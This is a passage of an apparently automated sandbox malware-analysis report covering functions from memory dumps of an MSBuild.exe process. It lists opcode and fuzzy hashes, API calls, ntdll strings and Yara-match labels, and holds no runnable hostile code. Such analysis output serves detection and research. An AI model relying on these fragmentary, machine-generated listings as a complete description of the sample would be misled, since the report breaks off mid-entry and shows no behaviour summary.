Opcode ID: 1d104c494af693d5c51588ec464b0b6339ae3de0d88c833b2a25061d6d3f90b4
Instruction ID: 93bb1857e2903280aa55860441e73c4ac0942fd3df72363acf61f206a1cbe1db
Opcode Fuzzy Hash: 1d104c494af693d5c51588ec464b0b6339ae3de0d88c833b2a25061d6d3f90b4
Instruction Fuzzy Hash: 9690022921344002D180715C584864A000D97D1202F96D419A0016558DC91989695721

Function 01AA2CA0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 01AA2CAA

Memory Dump Source

Source File: 00000009.00000002.1562720664.0000000001A30000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A30000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_1a30000_MSBuild.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 596e101d759561441f7acb35826b7baa6e440c2ab750ec16ef91903c3ad5ae3d
Instruction ID: 6c028b5848363e7d5886b8872a2ae22ba6e4c0305d0aa9477d753eaa88b04305
Opcode Fuzzy Hash: 596e101d759561441f7acb35826b7baa6e440c2ab750ec16ef91903c3ad5ae3d
Instruction Fuzzy Hash: 2990023120144402D100759C5848686000D97E0301F56D015A5025555FC66989916631

Function 01AA2C70 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 01AA2C7A

Memory Dump Source

Source File: 00000009.00000002.1562720664.0000000001A30000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A30000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_1a30000_MSBuild.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 2578d83fc4c8f08547e1d9a24a7c442777b456b1deb658a0c31ec05914670713
Instruction ID: b11570d50262cc22ecf404229f83eef9ae5790234841e5726e58075479727710
Opcode Fuzzy Hash: 2578d83fc4c8f08547e1d9a24a7c442777b456b1deb658a0c31ec05914670713
Instruction Fuzzy Hash: 989002312014C802D110715C884478A000D97D0301F5AC415A4425658EC69989917621

Function 01AA2FB0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 01AA2FBA

Memory Dump Source

Source File: 00000009.00000002.1562720664.0000000001A30000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A30000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_1a30000_MSBuild.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 9c99aa7e72f7237550cdc36a43485830a4dd293b95f88bd067f6b5273b50e2ff
Instruction ID: ec53f89e1108f907be09fb18517b2a47fbaf6ddbabdfdb6d50b32032c6634cc5
Opcode Fuzzy Hash: 9c99aa7e72f7237550cdc36a43485830a4dd293b95f88bd067f6b5273b50e2ff
Instruction Fuzzy Hash: 18900221601440424140716C8C84946400DBBE1211B56C125A0999550EC55D89655B65

Function 01AA2F90 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 01AA2F9A

Memory Dump Source

Source File: 00000009.00000002.1562720664.0000000001A30000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A30000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_1a30000_MSBuild.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 4a66b9e16b9fa0548fd59ccf424cb436cf2770a2d4c51d3e9bd31033791bb314
Instruction ID: 06307bcb7923de6addcbaabb4e7c02ebfd599023ff175691629cfa6feef79dff
Opcode Fuzzy Hash: 4a66b9e16b9fa0548fd59ccf424cb436cf2770a2d4c51d3e9bd31033791bb314
Instruction Fuzzy Hash: 3A90023120184402D100715C4C5474B000D97D0302F56C015A1165555EC62989516A71

Function 01AA2FE0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 01AA2FEA

Memory Dump Source

Source File: 00000009.00000002.1562720664.0000000001A30000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A30000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_1a30000_MSBuild.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: a706ca49e4c9951fcd86299df3582fbaf6023871b3b6fbb6179a043e5a400e11
Instruction ID: fac260d93af18a634e0b04626f7cf9ae73f74697de01049d46a11abbdb05544e
Opcode Fuzzy Hash: a706ca49e4c9951fcd86299df3582fbaf6023871b3b6fbb6179a043e5a400e11
Instruction Fuzzy Hash: F2900221211C4042D200756C4C54B47000D97D0303F56C119A0155554DC91989615A21

Function 01AA2F30 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 01AA2F3A

Memory Dump Source

Source File: 00000009.00000002.1562720664.0000000001A30000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A30000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_1a30000_MSBuild.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 916156d398584b57a88797fa740bac5d16a98d21510284896acac30d4842967e
Instruction ID: cc7c9e31490b8c7940a999c9196cae454383a25a5ab9f4b635ec63a80f90cc51
Opcode Fuzzy Hash: 916156d398584b57a88797fa740bac5d16a98d21510284896acac30d4842967e
Instruction Fuzzy Hash: 6490026134144442D100715C4854B46000DD7E1301F56C019E1065554EC61DCD526626

Function 01AA2EA0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 01AA2EAA

Memory Dump Source

Source File: 00000009.00000002.1562720664.0000000001A30000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A30000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_1a30000_MSBuild.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 131869998649500d63c99dd2d2568298d53782e8b4f3fcafc1e00435a815e07f
Instruction ID: ee70ddb9a1c3f60bcdbf3a82cb04e6f8d307fd5882bb66d0d89954d01782e2ab
Opcode Fuzzy Hash: 131869998649500d63c99dd2d2568298d53782e8b4f3fcafc1e00435a815e07f
Instruction Fuzzy Hash: 8290027120144402D140715C4844786000D97D0301F56C015A5065554FC65D8ED56B65

Function 01AA2E80 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 01AA2E8A

Memory Dump Source

Source File: 00000009.00000002.1562720664.0000000001A30000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A30000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_1a30000_MSBuild.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 6c75d2c1779bd77577f8d5976fc35e43cb4c65d5ac67cbe5fb2d68a138287c1f
Instruction ID: 702fb851dd6aca0a00fab72e74ef9407201027a0a98fc32e5bb729246e97899f
Opcode Fuzzy Hash: 6c75d2c1779bd77577f8d5976fc35e43cb4c65d5ac67cbe5fb2d68a138287c1f
Instruction Fuzzy Hash: FF90022160144502D101715C4844656000E97D0241F96C026A1025555FCA298A92A631

Function 00409AA0 Relevance: .1, Instructions: 92COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.1560987932.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_400000_MSBuild.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 853c01b66d24f589df6b89bde03758f04558a5ab365de05a0f584bb7a63a4c44
Instruction ID: 4f20240aff7f2371bb6e5cfcebb6b85206ba00274494e6c7b70a30fa46eb6871
Opcode Fuzzy Hash: 853c01b66d24f589df6b89bde03758f04558a5ab365de05a0f584bb7a63a4c44
Instruction Fuzzy Hash: 48213CB2D4420957CB25D664AD52BFF737CAB54314F04007FE949A3182F638BF498BA6

Function 0041A5F0 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 24
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RtlAllocateHeap.NTDLL(&EA,?,00414C9F,00414C9F,?,00414526,?,?,?,?,?,00000000,00409CE3,?), ref: 0041A61D

Strings

&EA, xrefs: 0041A612, 0041A61C

Memory Dump Source

Source File: 00000009.00000002.1560987932.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_400000_MSBuild.jbxd

Yara matches

Similarity

API ID: AllocateHeap
String ID: &EA
API String ID: 1279760036-1330915590
Opcode ID: 5b685ba00e4f3e285a347290f69675979fbe5b3df3c61f88542a29b4b9d62cf4
Instruction ID: 65e1271fa0e6f293e5ca7d904ec396d69fb6d51de338ced040ab1bfa87458b74
Opcode Fuzzy Hash: 5b685ba00e4f3e285a347290f69675979fbe5b3df3c61f88542a29b4b9d62cf4
Instruction Fuzzy Hash: 1DE012B2200208ABDB14EF99DC41EA777ADAF88668F118559BA085B242C630F9118AB0

Function 00408393 Relevance: 1.7, APIs: 1, Instructions: 179
threadwindowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

PostThreadMessageW.USER32(?,00000111,00000000,00000000,?), ref: 0040836A

Memory Dump Source

Source File: 00000009.00000002.1560987932.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_400000_MSBuild.jbxd

Yara matches

Similarity

API ID: MessagePostThread
String ID:
API String ID: 1836367815-0
Opcode ID: 6510bad542e569eb83e13c0d7b9af0b646b64ee4fb77eb3f3de6adfb80fb1d36
Instruction ID: 6b7f8bb14e47255658c7646da0852285353572bc77bf5488c402d48e05627252
Opcode Fuzzy Hash: 6510bad542e569eb83e13c0d7b9af0b646b64ee4fb77eb3f3de6adfb80fb1d36
Instruction Fuzzy Hash: C861D6B0900309AFDB24DF64DD85FEB77E8EB48704F10056EF949A7281EB746941CBA9

Function 00408308 Relevance: 1.6, APIs: 1, Instructions: 58
threadwindowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

PostThreadMessageW.USER32(?,00000111,00000000,00000000,?), ref: 0040836A

Memory Dump Source

Source File: 00000009.00000002.1560987932.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_400000_MSBuild.jbxd

Yara matches

Similarity

API ID: MessagePostThread
String ID:
API String ID: 1836367815-0
Opcode ID: ac2face3a80b81d0fee9304aa7ab5d06d5dde750405c7724cc7e28b99046a3a9
Instruction ID: 716281bf38cec500bb380add113fdd5c594de8bf11c5bee183275e975ed6f696
Opcode Fuzzy Hash: ac2face3a80b81d0fee9304aa7ab5d06d5dde750405c7724cc7e28b99046a3a9
Instruction Fuzzy Hash: F801FC71A8031876EB20A6918D43FFF672C6B41F54F05412EFF04BA1C1D6F8690546F9

Function 0041A662 Relevance: 1.6, APIs: 1, Instructions: 56
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

ExitProcess.KERNEL32(?,?,00000000,?,?,?), ref: 0041A698

Memory Dump Source

Source File: 00000009.00000002.1560987932.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_400000_MSBuild.jbxd

Yara matches

Similarity

API ID: ExitProcess
String ID:
API String ID: 621844428-0
Opcode ID: dd6e3777131719cca2a418aa5b3391d70880d811ba777f66e6b8170cca4d0c63
Instruction ID: a69ed1b6dd219986bfb2f5c6a45b3a104f2452afec348c127e88c009e551c76d
Opcode Fuzzy Hash: dd6e3777131719cca2a418aa5b3391d70880d811ba777f66e6b8170cca4d0c63
Instruction Fuzzy Hash: 791103B2201108AFDB14DF98CC85EEB77A9AF8C354F158249BA4DA7241C630E951CBA4

Function 00408310 Relevance: 1.6, APIs: 1, Instructions: 55
threadwindowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

PostThreadMessageW.USER32(?,00000111,00000000,00000000,?), ref: 0040836A

Memory Dump Source

Source File: 00000009.00000002.1560987932.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_400000_MSBuild.jbxd

Yara matches

Similarity

API ID: MessagePostThread
String ID:
API String ID: 1836367815-0
Opcode ID: 6793861beeebbadff428f1e0055fcae04fb265a346085d9c044c4ec0df2940a0
Instruction ID: a0f03ca10d03d1d5c38d3c187be8154ddc7636efa3ebbcfd239e67dddfad06e3
Opcode Fuzzy Hash: 6793861beeebbadff428f1e0055fcae04fb265a346085d9c044c4ec0df2940a0
Instruction Fuzzy Hash: B4018471A8032877E720A6959C43FFE776C6B40B54F05012AFF04BA1C1E6A8690546EA

Function 0041A623 Relevance: 1.5, APIs: 1, Instructions: 30
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RtlFreeHeap.NTDLL(00000060,00409CE3,?,?,00409CE3,00000060,00000000,00000000,?,?,00409CE3,?,00000000), ref: 0041A65D

Memory Dump Source

Source File: 00000009.00000002.1560987932.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_400000_MSBuild.jbxd

Yara matches

Similarity

API ID: FreeHeap
String ID:
API String ID: 3298025750-0
Opcode ID: c9cede1a70ae172bd288e0e8bf369d21c6bb8e95861d8ebee86d7ece50247bb9
Instruction ID: 126ce3dd669e9c185ab9911fa29305926a5e12aa467f4e619f6b7b26b7caea20
Opcode Fuzzy Hash: c9cede1a70ae172bd288e0e8bf369d21c6bb8e95861d8ebee86d7ece50247bb9
Instruction Fuzzy Hash: 48F0E575200204AFD714DFA4EC45ED737A8FF44360F11465AF81857392C271EA05CFA0

Function 0041A630 Relevance: 1.5, APIs: 1, Instructions: 24
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RtlFreeHeap.NTDLL(00000060,00409CE3,?,?,00409CE3,00000060,00000000,00000000,?,?,00409CE3,?,00000000), ref: 0041A65D

Memory Dump Source

Source File: 00000009.00000002.1560987932.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_400000_MSBuild.jbxd

Yara matches

Similarity

API ID: FreeHeap
String ID:
API String ID: 3298025750-0
Opcode ID: c73a038728a0c461ae7389dd2c659cb336152b082840842379cc140023e4f07c
Instruction ID: a31e03847b69acb9206512889bce5d114748d47cfafea9ced6338f279cce3475
Opcode Fuzzy Hash: c73a038728a0c461ae7389dd2c659cb336152b082840842379cc140023e4f07c
Instruction Fuzzy Hash: 64E04FB12002046BD714DF59DC45EE777ADEF88754F014559FD0857241C630F910CAF0

Function 0041A790 Relevance: 1.5, APIs: 1, Instructions: 24COMMON

Download Yara Rule

APIs

LookupPrivilegeValueW.ADVAPI32(00000000,0000003C,0040F1C2,0040F1C2,0000003C,00000000,?,00409D55), ref: 0041A7C0

Memory Dump Source

Source File: 00000009.00000002.1560987932.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_400000_MSBuild.jbxd

Yara matches

Similarity

API ID: LookupPrivilegeValue
String ID:
API String ID: 3899507212-0
Opcode ID: 6066231f07dbbfb97dda43844c8c8cc76a5ad0e3334111b5d8a4297bdf0bdfe7
Instruction ID: b8658252b81b08ed33e4a874e4d8f80b0614426e32f2ee3a7d9107b08e04f012
Opcode Fuzzy Hash: 6066231f07dbbfb97dda43844c8c8cc76a5ad0e3334111b5d8a4297bdf0bdfe7
Instruction Fuzzy Hash: 9EE01AB12002086BDB10DF49DC85EE737ADAF88654F018155BA0857241C934E8118BF5

Function 0041A670 Relevance: 1.5, APIs: 1, Instructions: 20COMMON

Download Yara Rule

APIs

ExitProcess.KERNEL32(?,?,00000000,?,?,?), ref: 0041A698

Memory Dump Source

Source File: 00000009.00000002.1560987932.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_400000_MSBuild.jbxd

Yara matches

Similarity

API ID: ExitProcess
String ID:
API String ID: 621844428-0
Opcode ID: caa18f4ccbf82a939ed7a560578cfa8cb4ed60065234b72d20cd43f227523b36
Instruction ID: 94fb8da58e6992106aa2b0ab061ea4c6965e877b66759b154152d16d38dd5c99
Opcode Fuzzy Hash: caa18f4ccbf82a939ed7a560578cfa8cb4ed60065234b72d20cd43f227523b36
Instruction Fuzzy Hash: B9D017726002187BD620EB99DC85FD777ACDF487A4F0180AABA1C6B242C531FA108AE1

Function 01AA2C0A Relevance: 1.5, APIs: 1, Instructions: 8libraryCOMMONLIBRARYCODE

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 01AA2C24

Memory Dump Source

Source File: 00000009.00000002.1562720664.0000000001A30000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A30000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_1a30000_MSBuild.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: e3e04a06e83998eaa04d132c90ab992e991e3d7d7474bb3d85c1986ff357a2b1
Instruction ID: d4ffcd19d5c45a532a700841eb0aa43a0fe07300d5744c6dcf5f0e090cb72b69
Opcode Fuzzy Hash: e3e04a06e83998eaa04d132c90ab992e991e3d7d7474bb3d85c1986ff357a2b1
Instruction Fuzzy Hash: 7EB09B719015C5C5DA11E7644A08717790477D0701F56C076D2030741F473CC5D1E675

Non-executed Functions

Function 01AE2349 Relevance: 26.1, Strings: 20, Instructions: 1117COMMON

Download Yara Rule

Strings

UnloadEventTraceDepth, xrefs: 01AE24C0
@, xrefs: 01AE2942
Initializing the application verifier package failed with status 0x%08lx, xrefs: 01AE3176
DisableExceptionChainValidation, xrefs: 01AE275F
MaxLoaderThreads, xrefs: 01AE24EC
FrontEndHeapDebugOptions, xrefs: 01AE2489
ShutdownFlags, xrefs: 01AE24A1
GlobalFlag, xrefs: 01AE2F3F, 01AE3059
RaiseExceptionOnPossibleDeadlock, xrefs: 01AE2579
CFGOptions, xrefs: 01AE2967
MaxDeadActivationContexts, xrefs: 01AE2D82
GlobalFlag2, xrefs: 01AE2FC0
ExecuteOptions, xrefs: 01AE25A0
UseImpersonatedDeviceMap, xrefs: 01AE251C
TracingFlags, xrefs: 01AE2549
MinimumStackCommitInBytes, xrefs: 01AE2BB0
DisableHeapLookaside, xrefs: 01AE246D
minkernel\ntdll\ldrinit.c, xrefs: 01AE3187
@, xrefs: 01AE2B74
LdrpInitializeExecutionOptions, xrefs: 01AE317D

Memory Dump Source

Source File: 00000009.00000002.1562720664.0000000001A30000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A30000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_1a30000_MSBuild.jbxd

Similarity

API ID:
String ID: @$@$CFGOptions$DisableExceptionChainValidation$DisableHeapLookaside$ExecuteOptions$FrontEndHeapDebugOptions$GlobalFlag$GlobalFlag2$Initializing the application verifier package failed with status 0x%08lx$LdrpInitializeExecutionOptions$MaxDeadActivationContexts$MaxLoaderThreads$MinimumStackCommitInBytes$RaiseExceptionOnPossibleDeadlock$ShutdownFlags$TracingFlags$UnloadEventTraceDepth$UseImpersonatedDeviceMap$minkernel\ntdll\ldrinit.c
API String ID: 0-2160512332
Opcode ID: 7af523a3e6d1666c0c9a1a45316b5dc24bcab8299ab64f18521b8e4ce3184288
Instruction ID: b5fe8a7a7ee7681a8acfa80da38072b0a77acae25c773856942a2656193126dd
Opcode Fuzzy Hash: 7af523a3e6d1666c0c9a1a45316b5dc24bcab8299ab64f18521b8e4ce3184288
Instruction Fuzzy Hash: AD927E71604342AFE725DF28C888B6BBBE8BF84754F04492EFA95D7251D770E844CB92

Function 01A98620 Relevance: 17.7, Strings: 14, Instructions: 223COMMON

Download Yara Rule

Strings

First initialization stack trace. Use dps to dump it if non-NULL., xrefs: 01AD54E2
Critical section address, xrefs: 01AD5425, 01AD54BC, 01AD5534
Initialization stack trace. Use dps to dump it if non-NULL., xrefs: 01AD540A, 01AD5496, 01AD5519
Invalid debug info address of this critical section, xrefs: 01AD54B6
Thread is in a state in which it cannot own a critical section, xrefs: 01AD5543
8, xrefs: 01AD52E3
Second initialization stack trace. Use dps to dump it if non-NULL., xrefs: 01AD54CE
Address of the debug info found in the active list., xrefs: 01AD54AE, 01AD54FA
double initialized or corrupted critical section, xrefs: 01AD5508
Critical section address., xrefs: 01AD5502
Critical section debug info address, xrefs: 01AD541F, 01AD552E
corrupted critical section, xrefs: 01AD54C2
Thread identifier, xrefs: 01AD553A
undeleted critical section in freed memory, xrefs: 01AD542B

Memory Dump Source

Source File: 00000009.00000002.1562720664.0000000001A30000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A30000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_1a30000_MSBuild.jbxd

Similarity

API ID:
String ID: 8$Address of the debug info found in the active list.$Critical section address$Critical section address.$Critical section debug info address$First initialization stack trace. Use dps to dump it if non-NULL.$Initialization stack trace. Use dps to dump it if non-NULL.$Invalid debug info address of this critical section$Second initialization stack trace. Use dps to dump it if non-NULL.$Thread identifier$Thread is in a state in which it cannot own a critical section$corrupted critical section$double initialized or corrupted critical section$undeleted critical section in freed memory
API String ID: 0-2368682639
Opcode ID: ca6e0d9efc446b1607634c4dd872d2093bac1747a2b582fb733b350baf7248cc
Instruction ID: abbd360a00bb93e103f26254a84686937aa6b687b1dd29b008802c21cff2b631
Opcode Fuzzy Hash: ca6e0d9efc446b1607634c4dd872d2093bac1747a2b582fb733b350baf7248cc
Instruction Fuzzy Hash: 73818AB1E40748BFDB20CF99C944BAEBBF5BB48B14F144119F606BB241D779A940CB90

Function 01A929F9 Relevance: 14.2, Strings: 11, Instructions: 411COMMON

Download Yara Rule

Strings

RtlpResolveAssemblyStorageMapEntry, xrefs: 01AD261F
SXS: Attempt to translate DOS path name "%S" to NT format failed, xrefs: 01AD2506
@, xrefs: 01AD259B
SXS: Unable to open assembly directory under storage root "%S"; Status = 0x%08lx, xrefs: 01AD25EB
SXS: Assembly directory name stored in assembly information too long (%lu bytes) - ACTIVATION_CONTEXT_DATA at %p, xrefs: 01AD22E4
SXS: %s() bad parametersSXS: Map : %pSXS: Data : %pSXS: AssemblyRosterIndex: 0x%lxSXS: Map->AssemblyCount : 0x%lx, xrefs: 01AD2624
SXS: Unable to resolve storage root for assembly directory %wZ in %Iu tries, xrefs: 01AD24C0
SXS: Attempt to probe known root of assembly storage ("%wZ") failed; Status = 0x%08lx, xrefs: 01AD2409
SXS: Attempt to probe assembly storage root %wZ for assembly directory %wZ failed with status = 0x%08lx, xrefs: 01AD2498
SXS: Storage resolution failed to insert entry to storage map; Status = 0x%08lx, xrefs: 01AD2602
SXS: Attempt to insert well known storage root into assembly storage map assembly roster index %lu failed; Status = 0x%08lx, xrefs: 01AD2412

Memory Dump Source

Source File: 00000009.00000002.1562720664.0000000001A30000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A30000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_1a30000_MSBuild.jbxd

Similarity

API ID:
String ID: @$RtlpResolveAssemblyStorageMapEntry$SXS: %s() bad parametersSXS: Map : %pSXS: Data : %pSXS: AssemblyRosterIndex: 0x%lxSXS: Map->AssemblyCount : 0x%lx$SXS: Assembly directory name stored in assembly information too long (%lu bytes) - ACTIVATION_CONTEXT_DATA at %p$SXS: Attempt to insert well known storage root into assembly storage map assembly roster index %lu failed; Status = 0x%08lx$SXS: Attempt to probe assembly storage root %wZ for assembly directory %wZ failed with status = 0x%08lx$SXS: Attempt to probe known root of assembly storage ("%wZ") failed; Status = 0x%08lx$SXS: Attempt to translate DOS path name "%S" to NT format failed$SXS: Storage resolution failed to insert entry to storage map; Status = 0x%08lx$SXS: Unable to open assembly directory under storage root "%S"; Status = 0x%08lx$SXS: Unable to resolve storage root for assembly directory %wZ in %Iu tries
API String ID: 0-4009184096
Opcode ID: 5e9e64f9aeca1a4b0940105dde84cc5284bbf4b057eab5a8d012faa0028bd740
Instruction ID: c7f7931401e26aacf3c2d5fd552d9cdf5ac27310bea460a5373ddd4ea16925c2
Opcode Fuzzy Hash: 5e9e64f9aeca1a4b0940105dde84cc5284bbf4b057eab5a8d012faa0028bd740
Instruction Fuzzy Hash: 85025EF1D00669ABDF21DB54CD80BEAB7B8AF54304F4441EAE609A7241EB709EC4CF59

Function 01B08B42 Relevance: 12.6, Strings: 10, Instructions: 146COMMON

Download Yara Rule

Strings

DefaultBrowser_NOPUBLISHERID, xrefs: 01B08D00
services.exe, xrefs: 01B08B96
runtimebroker.exe, xrefs: 01B08B73
SegmentHeap, xrefs: 01B08BE9
lsass.exe, xrefs: 01B08BA1
csrss.exe, xrefs: 01B08B80
heapType, xrefs: 01B08BCB
svchost.exe, xrefs: 01B08B68
http://schemas.microsoft.com/SMI/2020/WindowsSettings, xrefs: 01B08BD0
smss.exe, xrefs: 01B08B8B

Memory Dump Source

Source File: 00000009.00000002.1562720664.0000000001A30000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A30000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_1a30000_MSBuild.jbxd

Similarity

API ID:
String ID: DefaultBrowser_NOPUBLISHERID$SegmentHeap$csrss.exe$heapType$http://schemas.microsoft.com/SMI/2020/WindowsSettings$lsass.exe$runtimebroker.exe$services.exe$smss.exe$svchost.exe
API String ID: 0-2515994595
Opcode ID: 8f5cdee2cca9f0e979939582b8c4f99aa7a8532c519657bf6232cf5dc4130c32
Instruction ID: 3f08fd247755bd18ee4f2d9d4b2c13aa188552d7afd6a2721db0ce785712de65
Opcode Fuzzy Hash: 8f5cdee2cca9f0e979939582b8c4f99aa7a8532c519657bf6232cf5dc4130c32
Instruction Fuzzy Hash: EA51ACB1904305ABC72BCF588944BABBBE8EF94350F144A5EF99983290E770D644CB92

Function 01B10274 Relevance: 10.3, Strings: 8, Instructions: 348COMMON

Download Yara Rule

Strings

RtlReAllocateHeap, xrefs: 01B102BF, 01B10362
Just reallocated block at %p to 0x%Ix bytes with tag %ws, xrefs: 01B1069F
About to rellocate block at %p to 0x%Ix bytes with tag %ws, xrefs: 01B104D3
HEAP[%wZ]: , xrefs: 01B10399, 01B104A8, 01B105D0, 01B10675, 01B106CC
Just reallocated block at %p to %Ix bytes, xrefs: 01B105F1
About to reallocate block at %p to %Ix bytes, xrefs: 01B103BA
Invalid allocation size - %Ix (exceeded %Ix), xrefs: 01B106EA
HEAP: , xrefs: 01B103A6, 01B104B5, 01B105DD, 01B10682, 01B106D9

Memory Dump Source

Source File: 00000009.00000002.1562720664.0000000001A30000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A30000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_1a30000_MSBuild.jbxd

Similarity

API ID:
String ID: About to reallocate block at %p to %Ix bytes$About to rellocate block at %p to 0x%Ix bytes with tag %ws$HEAP: $HEAP[%wZ]: $Invalid allocation size - %Ix (exceeded %Ix)$Just reallocated block at %p to %Ix bytes$Just reallocated block at %p to 0x%Ix bytes with tag %ws$RtlReAllocateHeap
API String ID: 0-1700792311
Opcode ID: 18740c963c0f3f59991f199f359dc226f59bfb757ead9563ed528318b09d7f30
Instruction ID: e9d1253565ed16ad4c3e0ca33bd5824103d0e5651370cc3b23032b00f1ff79f2
Opcode Fuzzy Hash: 18740c963c0f3f59991f199f359dc226f59bfb757ead9563ed528318b09d7f30
Instruction Fuzzy Hash: 46D1E331504785EFDB2AEFA8C441AADBBF1FF5A700F8A8099F8459B256D73499C0CB50

Function 01AE89B3 Relevance: 9.0, Strings: 7, Instructions: 259COMMON

Download Yara Rule

Strings

AVRF: %ws: pid 0x%X: flags 0x%X: application verifier enabled, xrefs: 01AE8A3D
VerifierDebug, xrefs: 01AE8CA5
HandleTraces, xrefs: 01AE8C8F
AVRF: -*- final list of providers -*- , xrefs: 01AE8B8F
VerifierDlls, xrefs: 01AE8CBD
AVRF: %ws: pid 0x%X: application verifier will be disabled due to an initialization error., xrefs: 01AE8A67
VerifierFlags, xrefs: 01AE8C50

Memory Dump Source

Source File: 00000009.00000002.1562720664.0000000001A30000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A30000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_1a30000_MSBuild.jbxd

Similarity

API ID:
String ID: AVRF: %ws: pid 0x%X: application verifier will be disabled due to an initialization error.$AVRF: %ws: pid 0x%X: flags 0x%X: application verifier enabled$AVRF: -*- final list of providers -*- $HandleTraces$VerifierDebug$VerifierDlls$VerifierFlags
API String ID: 0-3223716464
Opcode ID: 98f88915a0de81f930f0b80e900c17146cf609f7cf346648bc8c41969bb819b6
